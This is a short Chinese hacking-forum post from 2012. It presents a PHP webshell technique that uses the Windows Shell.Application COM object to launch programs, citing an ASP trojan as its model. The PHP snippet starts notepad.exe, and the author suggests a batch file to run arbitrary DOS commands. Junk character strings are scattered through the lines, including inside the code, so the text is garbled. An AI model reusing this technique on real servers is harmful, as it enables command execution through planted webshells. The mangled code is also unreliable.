关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
! D( u) l# Y, m K+ v0 I. K, `; F7 X2 ]8 P, E& t3 k
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
4 u" f& q( p* b7 V8 N1 f! r' d
; }8 B7 [7 D6 o0 I- U$ X<?php
3 r+ v& e4 H1 x# B; L$wsh = new COM('Shell.Application') or die("Shell.Application");8 ^9 g8 Y7 {: T. r K# e* N; M
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
. _/ _: o1 }$ O# _4 ]% ~8 E //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。# N( t+ e& k+ f: F0 Y+ c, ~
?>+ V. L$ @/ s" m3 {: g, s5 g8 V* C
/ f5 W2 Y. r/ n: Q7 Z' H. I
xp+APMServ5.2.0测试通过。
" G8 E% j* r& u3 L |
发表于 2012-9-15 14:29:01
收藏
支持
反对